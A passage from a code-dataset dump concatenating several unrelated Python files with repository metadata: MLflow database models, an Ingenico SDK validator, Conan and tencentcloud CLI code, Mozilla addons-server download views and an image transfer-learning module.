existing_metric = metrics.get(o.key)
if (existing_metric is None)\
or ((o.step, o.timestamp, o.value) >=
(existing_metric.step, existing_metric.timestamp,
existing_metric.value)):
metrics[o.key] = Metric(o.key, o.value, o.timestamp, o.step)
obj = list(metrics.values())
elif k == 'params':
obj = [Param(o.key, o.value) for o in obj]
elif k == 'tags':
obj = [RunTag(o.key, o.value) for o in obj]
elif base is RunInfo:
if k == 'source_type':
obj = SourceType.from_string(obj)
elif k == "status":
obj = RunStatus.from_string(obj)
elif k == "experiment_id":
obj = str(obj)
# Our data model defines experiment_ids as ints, but the in-memory representation was
# changed to be a string in time for 1.0.
if isinstance(model, SqlExperiment) and k == "experiment_id":
obj = str(obj)
config[k] = obj
return base(**config)
class SqlExperiment(Base):
"""
DB model for :py:class:`mlflow.entities.Experiment`. These are recorded in ``experiment`` table.
"""
__tablename__ = 'experiments'
experiment_id = Column(Integer, autoincrement=True)
"""
Experiment ID: `Integer`. *Primary Key* for ``experiment`` table.
"""
name = Column(String(256), unique=True, nullable=False)
"""
Experiment name: `String` (limit 256 characters). Defined as *Unique* and *Non null* in
table schema.
"""
artifact_location = Column(String(256), nullable=True)
"""
Default artifact location for this experiment: `String` (limit 256 characters). Defined as
*Non null* in table schema.
"""
lifecycle_stage = Column(String(32), default=LifecycleStage.ACTIVE)
"""
Lifecycle Stage of experiment: `String` (limit 32 characters).
Can be either ``active`` (default) or ``deleted``.
"""
__table_args__ = (
CheckConstraint(
lifecycle_stage.in_(LifecycleStage.view_type_to_stages(ViewType.ALL)),
name='lifecycle_stage'),
PrimaryKeyConstraint('experiment_id', name='experiment_pk')
)
def __repr__(self):
return '<SqlExperiment ({}, {})>'.format(self.experiment_id, self.name)
def to_mlflow_entity(self):
"""
Convert DB model to corresponding MLflow entity.
:return: :py:class:`mlflow.entities.Experiment`.
"""
return _create_entity(Experiment, self)
class SqlRun(Base):
"""
DB model for :py:class:`mlflow.entities.Run`. These are recorded in ``runs`` table.
"""
__tablename__ = 'runs'
run_uuid = Column(String(32), nullable=False)
"""
Run UUID: `String` (limit 32 characters). *Primary Key* for ``runs`` table.
"""
name = Column(String(250))
"""
Run name: `String` (limit 250 characters).
"""
source_type = Column(String(20), default=SourceType.to_string(SourceType.LOCAL))
"""
Source Type: `String` (limit 20 characters). Can be one of ``NOTEBOOK``, ``JOB``, ``PROJECT``,
``LOCAL`` (default), or ``UNKNOWN``.
"""
source_name = Column(String(500))
"""
Name of source recording the run: `String` (limit 500 characters).
"""
entry_point_name = Column(String(50))
"""
    Entry-point name that launched the run: `String` (limit 50 characters).
"""
user_id = Column(String(256), nullable=True, default=None)
"""
User ID: `String` (limit 256 characters). Defaults to ``null``.
"""
status = Column(String(20), default=RunStatus.to_string(RunStatus.SCHEDULED))
"""
Run Status: `String` (limit 20 characters). Can be one of ``RUNNING``, ``SCHEDULED`` (default),
``FINISHED``, ``FAILED``.
"""
start_time = Column(BigInteger, default=int(time.time()))
"""
Run start time: `BigInteger`. Defaults to current system time.
"""
end_time = Column(BigInteger, nullable=True, default=None)
"""
Run end time: `BigInteger`.
"""
source_version = Column(String(50))
"""
Source version: `String` (limit 50 characters).
"""
lifecycle_stage = Column(String(20), default=LifecycleStage.ACTIVE)
"""
    Lifecycle Stage of run: `String` (limit 20 characters).
Can be either ``active`` (default) or ``deleted``.
"""
artifact_uri = Column(String(200), default=None)
"""
Default artifact location for this run: `String` (limit 200 characters).
"""
experiment_id = Column(Integer, ForeignKey('experiments.experiment_id'))
"""
    Experiment ID to which this run belongs: *Foreign Key* into ``experiment`` table.
"""
experiment = relationship('SqlExperiment', backref=backref('runs', cascade='all'))
"""
SQLAlchemy relationship (many:one) with :py:class:`mlflow.store.dbmodels.models.SqlExperiment`.
"""
__table_args__ = (
CheckConstraint(source_type.in_(SourceTypes), name='source_type'),
CheckConstraint(status.in_(RunStatusTypes), name='status'),
CheckConstraint(lifecycle_stage.in_(LifecycleStage.view_type_to_stages(ViewType.ALL)),
name='lifecycle_stage'),
PrimaryKeyConstraint('run_uuid', name='run_pk')
)
def to_mlflow_entity(self):
"""
Convert DB model to corresponding MLflow entity.
:return: :py:class:`mlflow.entities.Run`.
"""
        # Run has different parameter names in __init__ than in its properties, so build it manually
info = _create_entity(RunInfo, self)
data = _create_entity(RunData, self)
return Run(run_info=info, run_data=data)
class SqlTag(Base):
"""
DB model for :py:class:`mlflow.entities.RunTag`. These are recorded in ``tags`` table.
"""
__tablename__ = 'tags'
key = Column(String(250))
"""
    Tag key: `String` (limit 250 characters). Part of *Primary Key* for ``tags`` table.
"""
value = Column(String(250), nullable=True)
"""
Value associated with tag: `String` (limit 250 characters). Could be *null*.
"""
run_uuid = Column(String(32), ForeignKey('runs.run_uuid'))
"""
    Run UUID to which this tag belongs: *Foreign Key* into ``runs`` table.
"""
run = relationship('SqlRun', backref=backref('tags', cascade='all'))
"""
SQLAlchemy relationship (many:one) with :py:class:`mlflow.store.dbmodels.models.SqlRun`.
"""
__table_args__ = (
PrimaryKeyConstraint('key', 'run_uuid', name='tag_pk'),
)
def __repr__(self):
return '<SqlRunTag({}, {})>'.format(self.key, self.value)
def to_mlflow_entity(self):
"""
Convert DB model to corresponding MLflow entity.
:return: :py:class:`mlflow.entities.RunTag`.
"""
return _create_entity(RunTag, self)
class SqlMetric(Base):
__tablename__ = 'metrics'
key = Column(String(250))
"""
Metric key: `String` (limit 250 characters). Part of *Primary Key* for ``metrics`` table.
"""
value = Column(Float, nullable=False)
"""
Metric value: `Float`. Defined as *Non-null* in schema.
"""
timestamp = Column(BigInteger, default=lambda: int(time.time()))
"""
Timestamp recorded for this metric entry: `BigInteger`. Part of *Primary Key* for
``metrics`` table.
"""
step = Column(BigInteger, default=0)
"""
Step recorded for this metric entry: `BigInteger`.
"""
run_uuid = Column(String(32), ForeignKey('runs.run_uuid'))
"""
    Run UUID to which this metric belongs: Part of *Primary Key* for
*Foreign Key* into ``runs`` table.
"""
run = relationship('SqlRun', backref=backref('metrics', cascade='all'))
"""
SQLAlchemy relationship (many:one) with :py:class:`mlflow.store.dbmodels.models.SqlRun`.
"""
__table_args__ = (
PrimaryKeyConstraint('key', 'timestamp', 'step', 'run_uuid', 'value', name='metric_pk'),
)
def __repr__(self):
return '<SqlMetric({}, {}, {}, {})>'.format(self.key, self.value, self.timestamp, self.step)
def to_mlflow_entity(self):
"""
Convert DB model to corresponding MLflow entity.
:return: :py:class:`mlflow.entities.Metric`.
"""
return _create_entity(Metric, self)
class SqlParam(Base):
__tablename__ = 'params'
key = Column(String(250))
"""
Param key: `String` (limit 250 characters). Part of *Primary Key* for ``params`` table.
"""
value = Column(String(250), nullable=False)
"""
Param value: `String` (limit 250 characters). Defined as *Non-null* in schema.
"""
run_uuid = Column(String(32), ForeignKey('runs.run_uuid'))
"""
    Run UUID to which this param belongs: Part of *Primary Key* for ``params`` table.
*Foreign Key* into ``runs`` table.
"""
run = relationship('SqlRun', backref=backref('params', cascade='all'))
"""
SQLAlchemy relationship (many:one) with :py:class:`mlflow.store.dbmodels.models.SqlRun`.
"""
__table_args__ = (
PrimaryKeyConstraint('key', 'run_uuid', name='param_pk'),
)
def __repr__(self):
return '<SqlParam({}, {})>'.format(self.key, self.value)
def to_mlflow_entity(self):
"""
Convert DB model to corresponding MLflow entity.
:return: :py:class:`mlflow.entities.Param`.
"""
return _create_entity(Param, self)
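# --- Hedged usage sketch (not part of the original module) ---
# A minimal way to exercise the declarative models above against a
# throwaway in-memory SQLite database. The database URL and the example
# experiment/run values are assumptions made for the illustration; the
# real MLflow SQLAlchemy store creates and manages these rows itself.
if __name__ == '__main__':
    from sqlalchemy import create_engine
    from sqlalchemy.orm import sessionmaker

    engine = create_engine('sqlite://')       # private in-memory database
    Base.metadata.create_all(engine)          # create the tables defined above
    session = sessionmaker(bind=engine)()

    experiment = SqlExperiment(name='demo', artifact_location='/tmp/demo')
    session.add(experiment)
    session.commit()

    run = SqlRun(run_uuid='0' * 32, experiment_id=experiment.experiment_id)
    session.add(run)
    session.commit()

    # Convert back to an MLflow entity, as the store layer would.
    print(experiment.to_mlflow_entity().name)
    print(session.query(SqlRun).filter_by(run_uuid='0' * 32).count())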
| 35.122699 | 100 | 0.602795 |
e749ae0a152fbfbdd73e27d215fc707cb36fb963
| 1,366 |
py
|
Python
|
ingenico/direct/sdk/domain/fixed_list_validator.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
ingenico/direct/sdk/domain/fixed_list_validator.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
ingenico/direct/sdk/domain/fixed_list_validator.py
|
Ingenico/direct-sdk-python2
|
1c5c08fe2281aa99bfe8e8e031071600cb3be11d
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# This class was auto-generated from the API references found at
# https://support.direct.ingenico.com/documentation/api/reference/
#
from ingenico.direct.sdk.data_object import DataObject
class FixedListValidator(DataObject):
__allowed_values = None
@property
def allowed_values(self):
"""
Type: list[str]
"""
return self.__allowed_values
@allowed_values.setter
def allowed_values(self, value):
self.__allowed_values = value
def to_dictionary(self):
dictionary = super(FixedListValidator, self).to_dictionary()
if self.allowed_values is not None:
dictionary['allowedValues'] = []
for element in self.allowed_values:
if element is not None:
dictionary['allowedValues'].append(element)
return dictionary
def from_dictionary(self, dictionary):
super(FixedListValidator, self).from_dictionary(dictionary)
if 'allowedValues' in dictionary:
if not isinstance(dictionary['allowedValues'], list):
raise TypeError('value \'{}\' is not a list'.format(dictionary['allowedValues']))
self.allowed_values = []
for element in dictionary['allowedValues']:
self.allowed_values.append(element)
return self
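# --- Hedged usage sketch (not part of the original module) ---
# A minimal round trip through the (de)serialisation helpers above. The
# allowed values are arbitrary, and DataObject.to_dictionary() /
# from_dictionary() are assumed to exchange plain dicts as elsewhere in
# the SDK.
if __name__ == '__main__':
    validator = FixedListValidator()
    validator.allowed_values = ['VISA', 'MASTERCARD']

    as_dict = validator.to_dictionary()   # {'allowedValues': ['VISA', 'MASTERCARD']}
    restored = FixedListValidator().from_dictionary(as_dict)
    print(restored.allowed_values)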
| 32.52381 | 97 | 0.644949 |
662f4208b526f4ac84a3e39af6d0244fbb63218b
| 1,646 |
py
|
Python
|
jigls/jeditor/operations/nodefactory.py
|
ironWolf1990/python-jils
|
87390cf871329e9a47f985b4f0c9fc9506bfdb91
|
[
"MIT"
] | 2 |
2021-04-08T14:57:58.000Z
|
2021-07-26T00:57:49.000Z
|
jigls/jeditor/operations/nodefactory.py
|
ironWolf1990/python-jils
|
87390cf871329e9a47f985b4f0c9fc9506bfdb91
|
[
"MIT"
] | null | null | null |
jigls/jeditor/operations/nodefactory.py
|
ironWolf1990/python-jils
|
87390cf871329e9a47f985b4f0c9fc9506bfdb91
|
[
"MIT"
] | 3 |
2021-05-19T18:48:57.000Z
|
2021-07-26T00:55:23.000Z
|
# import logging
# from typing import Dict, Optional
# from jigls.jeditor.base.nodebase import JBaseNode
# from jigls.jeditor.constants import JCONSTANTS
# from jigls.jeditor.ui.graphicnode import JGraphicsNode
# from jigls.logger import logger
# logger = logging.getLogger(__name__)
# class JNodeFactory:
# def __init__(self) -> None:
# self._nodeRegistry: Dict[str, object] = {}
# pass
# @property
# def nodeRegistry(self):
# return self._nodeRegistry
# def RegisterNode(self, name: str, node: object):
#         if name in self._nodeRegistry:
# logger.warning("node with name already registered")
# return
# self._nodeRegistry[name] = node
# def RegisterNodes(self, nodeDict: Dict[str, object]):
# for k, v in nodeDict.items():
# self.RegisterNode(k, v)
# def CreateRegisteredNode(self, nodeName: str) -> Optional[object]:
# if nodeName not in self._nodeRegistry:
# logger.error(f"node name {nodeName} not in registry")
# return
# return self._nodeRegistry[nodeName]
# def CreateGenericNode(self, inputMulti, outputMulti, inputs=2, output=1, *args, **kwargs):
# base = JBaseNode("base node")
# for i in range(inputs):
# base.AddInputSocket(
# name=f"in{i}",
# multiConnection=inputMulti,
# )
# for _ in range(output):
# base.AddOutputSocket(
# name="out1",
# multiConnection=outputMulti,
# )
# node = JGraphicsNode(base)
# return node
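# --- Hedged sketch (not part of the original module) ---
# The commented-out JNodeFactory above describes a simple name -> node
# registry. The self-contained version below illustrates the same pattern
# without the jigls/Qt dependencies; the class and method names are
# illustrative assumptions, not part of the original API.
class _SimpleNodeFactory(object):
    def __init__(self):
        self._registry = {}

    def register(self, name, node_cls):
        # Last registration wins; the original logs a warning and skips instead.
        self._registry[name] = node_cls

    def create(self, name, *args, **kwargs):
        node_cls = self._registry.get(name)
        if node_cls is None:
            raise KeyError("node name %r not in registry" % name)
        return node_cls(*args, **kwargs)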
| 30.481481 | 96 | 0.597813 |
84ee68733e5167ff90d0886ff60ca505713d9771
| 480 |
py
|
Python
|
recipes/tinyply/all/test_package/conanfile.py
|
rockandsalt/conan-center-index
|
d739adcec3e4dd4c250eff559ceb738e420673dd
|
[
"MIT"
] | 562 |
2019-09-04T12:23:43.000Z
|
2022-03-29T16:41:43.000Z
|
recipes/tinyply/all/test_package/conanfile.py
|
rockandsalt/conan-center-index
|
d739adcec3e4dd4c250eff559ceb738e420673dd
|
[
"MIT"
] | 9,799 |
2019-09-04T12:02:11.000Z
|
2022-03-31T23:55:45.000Z
|
recipes/tinyply/all/test_package/conanfile.py
|
rockandsalt/conan-center-index
|
d739adcec3e4dd4c250eff559ceb738e420673dd
|
[
"MIT"
] | 1,126 |
2019-09-04T11:57:46.000Z
|
2022-03-31T16:43:38.000Z
|
import os
from conans import ConanFile, CMake, tools
class TestPackageConan(ConanFile):
settings = "os", "compiler", "build_type", "arch"
generators = "cmake", "cmake_find_package_multi"
def build(self):
cmake = CMake(self)
cmake.configure()
cmake.build()
def test(self):
if not tools.cross_building(self.settings):
bin_path = os.path.join("bin", "test_package")
self.run(bin_path, run_environment=True)
| 26.666667 | 58 | 0.641667 |
36ec3873f8a1b4a2a578b18b0fe3fb1d4e845fa6
| 7,218 |
py
|
Python
|
src/olympia/versions/views.py
|
atiqueahmedziad/addons-server
|
6e1cc00bf15d245fbcdddf618286bba943731e45
|
[
"BSD-3-Clause"
] | 2 |
2019-08-18T13:00:40.000Z
|
2019-11-17T02:18:04.000Z
|
src/olympia/versions/views.py
|
atiqueahmedziad/addons-server
|
6e1cc00bf15d245fbcdddf618286bba943731e45
|
[
"BSD-3-Clause"
] | null | null | null |
src/olympia/versions/views.py
|
atiqueahmedziad/addons-server
|
6e1cc00bf15d245fbcdddf618286bba943731e45
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from django import http
from django.db.transaction import non_atomic_requests
from django.shortcuts import get_object_or_404, redirect
import olympia.core.logger
from olympia import amo
from olympia.access import acl
from olympia.addons.decorators import (
addon_view_factory, owner_or_unlisted_reviewer)
from olympia.addons.models import Addon
from olympia.amo.urlresolvers import reverse
from olympia.amo.utils import HttpResponseSendFile, render, urlparams
from olympia.files.models import File
from olympia.versions.models import Version
from olympia.lib.cache import cache_get_or_set, make_key
# The version detail page redirects to the version within pagination, so we
# need to enforce the number of versions per page.
PER_PAGE = 30
addon_view = addon_view_factory(Addon.objects.valid)
log = olympia.core.logger.getLogger('z.versions')
def _version_list_qs(addon):
# We only show versions that have files with the right status.
if addon.is_unreviewed():
status = amo.STATUS_AWAITING_REVIEW
else:
status = amo.STATUS_PUBLIC
return (addon.versions.filter(channel=amo.RELEASE_CHANNEL_LISTED)
.filter(files__status=status)
.distinct().order_by('-created'))
@addon_view
@non_atomic_requests
def version_list(request, addon):
qs = _version_list_qs(addon)
versions = amo.utils.paginate(request, qs, PER_PAGE)
versions.object_list = list(versions.object_list)
Version.transformer(versions.object_list)
return render(request, 'versions/version_list.html', {
'addon': addon, 'versions': versions})
@addon_view
@non_atomic_requests
def version_detail(request, addon, version_num):
    # TODO: Does setting this in memcached even make sense?
# This is specific to an add-ons version so the chance of this hitting
# the cache and not missing seems quite bad to me (cgrebs)
def _fetch():
qs = _version_list_qs(addon)
return list(qs.values_list('version', flat=True))
cache_key = make_key(
u'version-detail:{}:{}'.format(addon.id, version_num),
normalize=True)
ids = cache_get_or_set(cache_key, _fetch)
url = reverse('addons.versions', args=[addon.slug])
if version_num in ids:
page = 1 + ids.index(version_num) / PER_PAGE
to = urlparams(url, 'version-%s' % version_num, page=page)
return http.HttpResponseRedirect(to)
else:
raise http.Http404()
@addon_view
@non_atomic_requests
def update_info(request, addon, version_num):
version = Version.objects.filter(addon=addon, version=version_num,
files__status__in=amo.VALID_FILE_STATUSES,
channel=amo.RELEASE_CHANNEL_LISTED).last()
if not version:
raise http.Http404()
return render(request, 'versions/update_info.html',
{'version': version},
content_type='application/xhtml+xml')
@non_atomic_requests
def update_info_redirect(request, version_id):
version = get_object_or_404(Version.objects, pk=version_id)
return redirect(reverse('addons.versions.update_info',
args=(version.addon.id, version.version)),
permanent=True)
# Should accept junk at the end for filename goodness.
@non_atomic_requests
def download_file(request, file_id, type=None, file_=None, addon=None):
def is_appropriate_reviewer(addon, channel):
return (acl.is_reviewer(request, addon)
if channel == amo.RELEASE_CHANNEL_LISTED
else acl.check_unlisted_addons_reviewer(request))
if not file_:
file_ = get_object_or_404(File.objects, pk=file_id)
if not addon:
addon = get_object_or_404(Addon.objects,
pk=file_.version.addon_id)
channel = file_.version.channel
if addon.is_disabled or file_.status == amo.STATUS_DISABLED:
if (is_appropriate_reviewer(addon, channel) or
acl.check_addon_ownership(
request, addon, dev=True, ignore_disabled=True)):
return HttpResponseSendFile(
request, file_.guarded_file_path,
content_type='application/x-xpinstall')
else:
log.info(
u'download file {file_id}: addon/file disabled and '
u'user {user_id} is not an owner or reviewer.'.format(
file_id=file_id, user_id=request.user.pk))
raise http.Http404() # Not owner or admin.
if channel == amo.RELEASE_CHANNEL_UNLISTED:
if (acl.check_unlisted_addons_reviewer(request) or
acl.check_addon_ownership(
request, addon, dev=True, ignore_disabled=True)):
return HttpResponseSendFile(
request, file_.file_path,
content_type='application/x-xpinstall')
else:
log.info(
u'download file {file_id}: version is unlisted and '
u'user {user_id} is not an owner or reviewer.'.format(
file_id=file_id, user_id=request.user.pk))
raise http.Http404() # Not owner or admin.
attachment = bool(type == 'attachment')
loc = urlparams(file_.get_file_cdn_url(attachment=attachment),
filehash=file_.hash)
response = http.HttpResponseRedirect(loc)
response['X-Target-Digest'] = file_.hash
return response
def guard():
return Addon.objects.filter(_current_version__isnull=False)
@addon_view_factory(guard)
@non_atomic_requests
def download_latest(request, addon, type='xpi', platform=None):
platforms = [amo.PLATFORM_ALL.id]
if platform is not None and int(platform) in amo.PLATFORMS:
platforms.append(int(platform))
version = addon._current_version_id
files = File.objects.filter(platform__in=platforms,
version=version)
try:
# If there's a file matching our platform, it'll float to the end.
file_ = sorted(files, key=lambda f: f.platform == platforms[-1])[-1]
except IndexError:
raise http.Http404()
return download_file(request, file_.id, type=type, file_=file_,
addon=addon)
@non_atomic_requests
def download_source(request, version_id):
version = get_object_or_404(Version.objects, pk=version_id)
# General case: version is listed.
if version.channel == amo.RELEASE_CHANNEL_LISTED:
if not (version.source and
(acl.check_addon_ownership(
request, version.addon, dev=True, ignore_disabled=True))):
raise http.Http404()
else:
if not owner_or_unlisted_reviewer(request, version.addon):
raise http.Http404 # Not listed, not owner or unlisted reviewer.
res = HttpResponseSendFile(request, version.source.path)
path = version.source.path
if not isinstance(path, unicode):
path = path.decode('utf8')
name = os.path.basename(path.replace(u'"', u''))
disposition = u'attachment; filename="{0}"'.format(name).encode('utf8')
res['Content-Disposition'] = disposition
return res
| 37.59375 | 79 | 0.667636 |
dcf9d9bcdcf6324de552bc3b65ea9012cfa88f70
| 7,227 |
py
|
Python
|
image_transfer_learning/image_processing.py
|
jonathan-smith-1/image_transfer_learning
|
9020ecfa45e1591b9ad6ed2abe2a2e89a180edd4
|
[
"MIT"
] | null | null | null |
image_transfer_learning/image_processing.py
|
jonathan-smith-1/image_transfer_learning
|
9020ecfa45e1591b9ad6ed2abe2a2e89a180edd4
|
[
"MIT"
] | null | null | null |
image_transfer_learning/image_processing.py
|
jonathan-smith-1/image_transfer_learning
|
9020ecfa45e1591b9ad6ed2abe2a2e89a180edd4
|
[
"MIT"
] | null | null | null |
"""Image processing functions."""
import os
import pickle
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
from skimage.io import imread
from skimage.transform import resize
from PIL import ImageFile
ImageFile.LOAD_TRUNCATED_IMAGES = True # Needed for large images
def make_square(img):
"""
Trim an image to make it square by keeping the centre part.
Args:
img (Numpy array): Input image with shape (height, width, channels)
Returns:
Numpy array of trimmed image, with shape (new_height, new_width,
channels)
"""
height, width, _ = img.shape
if height >= width:
h_max = int(height/2 + width/2)
h_min = int(height/2 - width/2)
trimmed_image = img[h_min:h_max, :, :].copy()
else:
w_max = int(width/2 + height/2)
w_min = int(width/2 - height/2)
trimmed_image = img[:, w_min:w_max, :].copy()
return trimmed_image
def convert_images(images_path, save_path, lab_to_int=None):
"""
Convert images into feature vectors and saves them in a pickle file.
This function uses transfer learning. A pre-trained network is loaded
and used.
A dictionary mapping labels to integers can be passed in, or can be
generated and returned. This is so it can be reused on other datasets.
E.g. the training data may have more classes in than the test data,
so this mapping needs to be created using the training data and then
reused on the validation and test data.
Args:
images_path (string): Filepath of the directory containing the
training images. The images must be in
folders with the category names.
A suitable file structure is shown below:
|- images_path/
| |- category_1
| |- image_1.jpg
| |- image_2.jpg
| |- ...
| |- category_2
| |- image_3.jpg
| |- image_4.jpg
| |- ...
| |- ...
save_path (string): Filepath to a pickle file that will be created
by this function.
lab_to_int (dict): Mapping from labels (strings) to integers.
Optional argument. If provided, this dictionary
will be used. If not provided, then this
dictionary will be generated.
Returns:
A dictionary mapping from labels (strings) to integers.
"""
print('Converting images from: ' + images_path)
# Convert each image to a feature vector
feature_vectors = []
labels = []
if not lab_to_int:
_, lab_to_int = enumerate_labels(images_path)
with tf.Graph().as_default():
mod = hub.Module("https://tfhub.dev/google/imagenet/inception_v3/"
"feature_vector/1")
height, width = hub.get_expected_image_size(mod)
# [batch_size, height, width, channels]
images = tf.placeholder(tf.float32,
shape=[1, height, width, 3],
name='Input_images')
# Features have shape [batch_size, num_features].
features = mod(images)
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
sess.run(tf.tables_initializer())
for category_dir in os.scandir(images_path):
label = os.path.basename(os.path.normpath(category_dir))
for image_path in os.scandir(category_dir):
print(image_path.name)
# img_num = 0 accounts for images with multiple frames
image = imread(os.path.abspath(image_path), img_num=0)
image = make_square(image)
# Constant argument prevents deprecation warning
image = resize(image, (height, width), anti_aliasing=True,
mode='constant')
image = np.expand_dims(image, axis=0)
vec = sess.run(features, feed_dict={images: image})
feature_vectors.append(vec)
labels.append(lab_to_int[label])
feature_vectors_array = np.concatenate(feature_vectors, axis=0)
labels_array = np.array(labels)
data = {'feature_vectors_array': feature_vectors_array,
'labels_array': labels_array,
'label_to_int': lab_to_int}
with open(save_path, 'wb') as file:
pickle.dump(data, file, pickle.HIGHEST_PROTOCOL)
return lab_to_int
def get_feature_vector_size(path):
"""
Get the length of the feature vectors.
Feature vectors are assumed to be in a pickle file or npz file (or
similar) that loads into a dictionary with key, value pair of
'feature_vectors_array' and a 2D numpy array of feature vectors. The
feature vectors array is a 2D numpy array of shape (num_vectors,
vector_length).
Args:
path (string): Path of file containing feature vectors.
    Returns:
        The length of each feature vector (int).
"""
data = np.load(path)
return data['feature_vectors_array'].shape[1]
def get_num_classes(path):
"""
Get the number of classes in the data.
Together with the feature vectors and the labels is a dictionary mapping
the labels to integers. The size of this dictionary gives the number
of classes.
The labels to integers dictionary is assumed to be in a pickle file or
npz file (or similar) that loads into a dictionary with key, value pair of
'label_to_int' and this dictionary.
Args:
path (string): Path of file containing the mapping of labels to
integers.
    Returns:
        The number of classes (int).
"""
data = np.load(path)
return len(data['label_to_int'])
def enumerate_labels(path):
"""
Create dictionaries mapping label to integer and integer to label.
Args:
path (string): Filepath of the directory folders named after each
category.
A suitable file structure is shown below:
|- images_path/
| |- category_1
| |- image_1.jpg
| |- image_2.jpg
| |- ...
| |- category_2
| |- image_3.jpg
| |- image_4.jpg
| |- ...
| |- ...
    Returns:
        A tuple (int_to_lab, lab_to_int) of dictionaries mapping integers to
        labels and labels to integers.
"""
labels = set()
for category_dir in os.scandir(path):
labels.add(os.path.basename(os.path.normpath(category_dir)))
int_to_lab = dict(enumerate(sorted(labels)))
lab_to_int = {v: k for k, v in int_to_lab.items()}
return int_to_lab, lab_to_int
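# --- Hedged usage sketch (not part of the original module) ---
# Typical call sequence for the helpers above. The directory and pickle
# file paths are placeholder assumptions; the point being illustrated is
# that the label-to-integer mapping built from the training images is
# reused when converting the validation images.
if __name__ == '__main__':
    TRAIN_DIR = 'data/train_images'   # one sub-folder per category
    VAL_DIR = 'data/val_images'

    label_to_int = convert_images(TRAIN_DIR, 'train_features.pkl')
    convert_images(VAL_DIR, 'val_features.pkl', lab_to_int=label_to_int)

    print('Feature vector length: %d'
          % get_feature_vector_size('train_features.pkl'))
    print('Number of classes: %d' % get_num_classes('train_features.pkl'))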
| 31.697368 | 78 | 0.555556 |
29e41964c1afa023ead9ff36ae2b4a3b278c743f
| 17,734 |
py
|
Python
|
tccli/services/cloudhsm/cloudhsm_client.py
|
ws0416/tencentcloud-cli
|
0a90fa77c8be1efa30b196a3eeb31b8be1f6a325
|
[
"Apache-2.0"
] | null | null | null |
tccli/services/cloudhsm/cloudhsm_client.py
|
ws0416/tencentcloud-cli
|
0a90fa77c8be1efa30b196a3eeb31b8be1f6a325
|
[
"Apache-2.0"
] | null | null | null |
tccli/services/cloudhsm/cloudhsm_client.py
|
ws0416/tencentcloud-cli
|
0a90fa77c8be1efa30b196a3eeb31b8be1f6a325
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import json
import tccli.options_define as OptionsDefine
import tccli.format_output as FormatOutput
from tccli import __version__
from tccli.utils import Utils
from tccli.exceptions import ConfigurationError
from tencentcloud.common import credential
from tencentcloud.common.profile.http_profile import HttpProfile
from tencentcloud.common.profile.client_profile import ClientProfile
from tencentcloud.cloudhsm.v20191112 import cloudhsm_client as cloudhsm_client_v20191112
from tencentcloud.cloudhsm.v20191112 import models as models_v20191112
def doModifyVsmAttributes(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.ModifyVsmAttributesRequest()
model.from_json_string(json.dumps(args))
rsp = client.ModifyVsmAttributes(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeVsmAttributes(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeVsmAttributesRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeVsmAttributes(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeVsms(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
g_param[OptionsDefine.SecretId], g_param[OptionsDefine.SecretKey], g_param[OptionsDefine.Token]
)
http_profile = HttpProfile(
reqTimeout=60 if g_param[OptionsDefine.Timeout] is None else int(g_param[OptionsDefine.Timeout]),
reqMethod="POST",
endpoint=g_param[OptionsDefine.Endpoint],
proxy=g_param[OptionsDefine.HttpsProxy]
)
profile = ClientProfile(httpProfile=http_profile, signMethod="HmacSHA256")
mod = CLIENT_MAP[g_param[OptionsDefine.Version]]
client = mod.CloudhsmClient(cred, g_param[OptionsDefine.Region], profile)
client._sdkVersion += ("_CLI_" + __version__)
models = MODELS_MAP[g_param[OptionsDefine.Version]]
model = models.DescribeVsmsRequest()
model.from_json_string(json.dumps(args))
rsp = client.DescribeVsms(model)
result = rsp.to_json_string()
try:
json_obj = json.loads(result)
except TypeError as e:
json_obj = json.loads(result.decode('utf-8')) # python3.3
FormatOutput.output("action", json_obj, g_param[OptionsDefine.Output], g_param[OptionsDefine.Filter])
def doDescribeVpc(args, parsed_globals):
g_param = parse_global_arg(parsed_globals)
cred = credential.Credential(
